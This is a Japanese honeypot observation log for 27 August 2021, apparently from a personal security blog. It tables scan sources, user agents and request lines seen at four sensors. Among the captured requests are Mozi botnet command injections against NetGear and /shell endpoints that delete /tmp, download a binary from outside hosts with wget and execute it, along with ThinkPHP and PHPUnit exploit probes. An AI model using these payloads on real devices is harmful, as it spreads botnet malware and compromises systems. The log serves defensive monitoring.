2021/08/27 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/08/27分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location：JP

aiohttpによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

Location：US

Axis製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
gbrmssによるスキャン行為
Nmap Scripting Engineによるスキャン行為
Wgetによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
を確認しました。

Location：UK

NetGear製品の脆弱性を狙うアクセス
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws

Location：SG

aiohttpによるスキャン行為
Nmap Scripting Engineによるスキャン行為
Wgetによるスキャン行為
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。

他

アクセス数推移

JP：総アクセス数：128 (前日比：+40)
US：総アクセス数：111 (前日比：+54)
UK：総アクセス数：59 (前日比：+9)
SG：総アクセス数：73 (前日比：+14)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.138.107.102	United States
1	5.188.210.227	Russia
33	13.82.227.146	United States
5	20.150.209.191	United States
1	23.129.64.130	United States
1	34.133.184.29	United States
2	35.182.154.212	United States
1	45.95.147.10	Netherlands
11	45.146.164.110	Russia
17	51.13.96.246	United Kingdom
3	52.161.7.153	United States
7	52.188.2.72	United States
1	54.166.54.235	United States
1	54.226.217.144	United States
1	64.227.77.208	United States
4	68.183.196.51	United States
1	91.234.62.116	Russia
1	123.31.43.116	Vietnam
1	128.1.248.42	United States
1	142.93.129.100	United States
1	143.244.136.158	United States
1	143.244.137.127	United States
1	157.245.48.241	United States
1	160.177.222.222	Morocco
7	161.35.176.56	United States
2	185.53.90.24	Belize
1	185.254.31.134	Turkey
1	192.241.206.175	United States
6	194.85.249.7	Czechia
2	199.19.224.165	United States
3	205.185.115.135	United States
4	205.185.126.200	United States
1	206.189.114.52	United States
1	209.17.96.66	United States
2	209.141.32.217	United States

UserAgent一覧

件数	UserAgent
18	-
8	Go-http-client/1.1
1	Hello, World
1	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
17	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
33	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
1	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
14	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
9	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
1	Mozilla/5.0 zgrab/0.x
1	Python/3.7 aiohttp/3.7.4.post0
1	Roku/DVP-9.10 (289.10E04111A)
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x16\x03\x01
2		\x16\x03\x01\x01\xfa\x01
16	GET	/.env	HTTP/1.1
1	GET	/.git	HTTP/1.1
1	GET	//MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	//myadmin/scripts/setup.php	HTTP/1.1
1	GET	//phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	//phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	//pma/scripts/setup.php	HTTP/1.1
1	GET	/2019/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/2020/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/admin/.env	HTTP/1.1
1	GET	/api/.env	HTTP/1.1
2	GET	/app/.env	HTTP/1.1
1	GET	/app/config/.env	HTTP/1.1
1	GET	/application/application.ini	HTTP/1.1
1	GET	/application/configs/application.ini	HTTP/1.1
1	GET	/apps/.env	HTTP/1.1
1	GET	/audio/.env	HTTP/1.1
1	GET	/backend/.env	HTTP/1.1
1	GET	/base/.env	HTTP/1.1
1	GET	/blob/.env	HTTP/1.1
1	GET	/blog/.env	HTTP/1.1
1	GET	/blog/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/c/version.js	HTTP/1.1
1	GET	/cgi-bin/.env	HTTP/1.1
1	GET	/cms/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/conf/.env	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/core/.env	HTTP/1.1
1	GET	/crm/.env	HTTP/1.1
1	GET	/database/.env	HTTP/1.1
1	GET	/ec2-18-179-20-5.ap-northeast-1.compute.amazonaws.com/.env	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/flu/403.html	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/laravel/.env	HTTP/1.1
1	GET	/library/.env	HTTP/1.1
1	GET	/local/.env	HTTP/1.1
1	GET	/muieblackcat	HTTP/1.1
1	GET	/new/.env	HTTP/1.1
1	GET	/news/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/newsite/.env	HTTP/1.1
1	GET	/old/.env	HTTP/1.1
1	GET	/phpmyadmin/	HTTP/1.1
1	GET	/protected/.env	HTTP/1.1
1	GET	/public/.env	HTTP/1.1
1	GET	/shop/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/site/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/sites/all/libraries/mailchimp/.env	HTTP/1.1
1	GET	/sito/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/solr/	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/src/.env	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/storage/.env	HTTP/1.1
1	GET	/stream/live.php	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/test/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/vendor/.env	HTTP/1.1
2	GET	/vendor/laravel/.env	HTTP/1.1
3	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/web/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/website/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wordpress/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp-admin/.env	HTTP/1.1
1	GET	/wp-content/.env	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp1/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp2/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/www/.env	HTTP/1.1
2	GET	/xmlrpc.php?rsd	HTTP/1.1
1	GET	http[:]//5[.]188[.]210[.]227/echo.php	HTTP/1.1
7	GET	http[:]//azenv[.]net/	HTTP/1.1
1	HEAD	/	HTTP/1.0\n
1	HEAD	/robots.txt	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
9	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
6	1.117.47.51	China
1	13.76.215.249	United States
3	20.150.209.191	United States
3	45.61.146.242	United States
1	45.95.147.10	Netherlands
7	45.129.136.74	Lebanon
22	45.146.164.110	Russia
1	45.201.206.80	Cambodia
7	47.242.67.185	United States
1	54.234.26.225	United States
1	61.242.54.86	China
1	77.247.108.42	Belize
2	80.82.78.39	United Kingdom
7	104.248.148.143	United States
1	104.248.198.153	United States
3	111.67.204.60	China
1	113.239.217.154	China
1	114.246.34.215	China
1	115.63.44.230	China
2	128.92.131.218	United States
1	129.191.21.220	United States
11	134.122.112.12	United States
1	143.244.181.206	United States
1	157.245.48.241	United States
4	183.136.225.14	China
2	185.53.90.24	Belize
1	192.241.200.226	United States
2	193.118.53.194	United States
1	193.142.146.237	Germany
1	197.210.28.199	Nigeria
1	198.12.90.235	United States
2	199.19.224.165	United States
1	205.185.115.135	United States
3	205.185.126.200	United States
1	206.189.113.12	United States
1	209.17.96.50	United States
1	209.17.96.66	United States
2	209.141.32.217	United States
2	209.141.53.116	United States

UserAgent一覧

件数	UserAgent
21	-
2	AccServer[HDVA-NIJ7UO5MTB]/6.6.0.22(43371) 64-bit HTTP-Agent
16	Go-http-client/1.1
1	Mozilla/5.0
2	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
9	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
4	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
4	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
1	Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
6	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
4	Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
1	Mozilla/5.0 zgrab/0.x
1	VLC/3.0.8 LibVLC/3.0.8
1	Wget/1.20.1 (linux-gnu)
1	gbrmss/7.29.0

リクエスト内容一覧

件数	Method	Request	Protocol
7		\x03
4		\x16\x03\x01
2		\x16\x03\x01\x01\xfb\x01
2		\x16\x03\x01\x02
1	CONNECT	leakix[.]net:443	HTTP/1.1
1	GET	/.DS_Store	HTTP/1.1
8	GET	/.env	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
1	GET	/.json	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/api/.env	HTTP/1.1
1	GET	/api/tokens	HTTP/1.1
2	GET	/axis-cgi/admin/param.cgi?action=list&group=Properties	HTTP/1.0
1	GET	/boaform/admin/formLogin?username=adminisp&psd=adminisp	HTTP/1.0
1	GET	/boaform/admin/formLogin?username=user&psd=user	HTTP/1.0
1	GET	/c/version.js	HTTP/1.1
1	GET	/config.json	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/evox/about	HTTP/1.1
4	GET	/favicon.ico	HTTP/1.1
1	GET	/flu/403.html	HTTP/1.1
1	GET	/guacamole/api/tokens	HTTP/1.1
1	GET	/idx_config/	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/info.php	HTTP/1.1
1	GET	/laravel/.env	HTTP/1.1
1	GET	/nmaplowercheck1630009058	HTTP/1.1
3	GET	/phpmyadmin/index.php	HTTP/1.1
2	GET	/phpmyadmin4.8.5/index.php	HTTP/1.1
4	GET	/pmd/index.php	HTTP/1.1
1	GET	/recordings/theme/main.css	HTTP/1.1
2	GET	/robots.txt	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//113[.]239[.]217[.]154:46506/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/solr/	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/somesomesome.txt	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/stream/live.php	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/telescope/requests	HTTP/1.1
1	GET	/v2/_catalog	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/webfig/	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
5	GET	http[:]//azenv[.]net/	HTTP/1.1
1	GET	http[:]//example[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	HEAD	/robots.txt	HTTP/1.0
2	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
6	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/sdk	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	14.161.112.124	Vietnam
6	20.150.209.191	United States
1	23.94.199.131	United States
1	45.95.147.10	Netherlands
11	45.146.164.110	Russia
1	59.94.180.65	India
1	61.219.11.153	Taiwan
1	66.240.205.34	United States
2	80.82.78.39	United Kingdom
1	120.85.116.104	China
1	125.43.24.107	China
1	128.1.248.42	United States
1	128.14.209.162	United States
1	134.119.189.155	Germany
1	143.244.189.6	United States
4	164.52.24.163	China
1	171.95.84.198	China
7	178.62.245.128	United States
2	185.53.90.24	Belize
4	193.56.29.183	United Kingdom
1	193.142.146.237	Germany
3	199.19.224.165	United States
1	205.185.115.135	United States
3	205.185.126.200	United States
2	209.141.32.217	United States

UserAgent一覧

件数	UserAgent
13	-
9	Go-http-client/1.1
1	Hello, world
1	Mozilla/5.0
1	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
6	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Roku/DVP-9.10 (289.10E04111A)

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
1		Gh0st\xad
4		\x16\x03\x01
1		\x16\x03\x01\x01	\x01
3	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/app/.env	HTTP/1.1
1	GET	/c/version.js	HTTP/1.1
4	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/core/.env	HTTP/1.1
1	GET	/flu/403.html	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/public/.env	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]43[.]24[.]107:38486/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]94[.]180[.]65:53722/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/somesomesome.txt	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/stream/live.php	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/webfig/	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
8	GET	http[:]//azenv[.]net/	HTTP/1.1
1	GET	http[:]//example[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	HEAD	/robots.txt	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
6	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
3	20.150.209.191	United States
1	27.215.111.167	China
1	45.95.147.10	Netherlands
11	45.146.164.110	Russia
7	47.252.5.200	United States
17	51.13.96.246	United Kingdom
1	51.75.63.200	France
2	54.210.44.33	United States
1	64.227.77.208	United States
1	89.44.9.171	Romania
1	103.28.70.137	United States
1	112.239.113.131	China
3	117.239.149.94	India
1	123.11.152.25	China
1	128.14.134.170	United States
1	128.14.209.162	United States
1	143.244.189.6	United States
1	178.128.30.203	United States
2	183.136.225.14	China
2	185.53.90.24	Belize
3	185.156.73.15	Russia
1	192.241.206.88	United States
1	193.56.29.105	United Kingdom
1	199.19.224.165	United States
2	205.185.115.135	United States
2	205.185.126.200	United States
1	209.17.96.18	United States
2	209.141.32.217	United States

UserAgent一覧

件数	UserAgent
13	-
5	Go-http-client/1.1
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
17	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
6	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4	Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
1	Mozilla/5.0 zgrab/0.x
2	Python/3.7 aiohttp/3.7.4.post0
1	User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
1	Wget/1.20.1 (linux-gnu)
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
3		-
2		27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$	HTTP/1.0
3		\x16\x03\x01
2		\x16\x03\x01\x02
4	GET	/.env	HTTP/1.1
1	GET	/2019/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/2020/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/CFIDE/administrator/	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/_profiler/phpinfo	HTTP/1.1
1	GET	/blog/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/cms/wp-includes/wlwmanifest.xml	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/evox/about	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/news/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/nmaplowercheck1629923166	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/shop/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/site/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/sito/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/solr/	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/test/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/web/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/webfig/	HTTP/1.1
1	GET	/website/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wordpress/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp1/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp2/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/xmlrpc.php?rsd	HTTP/1.1
1	GET	http[:]//5[.]188[.]210[.]227/echo.php	HTTP/1.1
5	GET	http[:]//azenv[.]net/	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
6	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/sdk	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1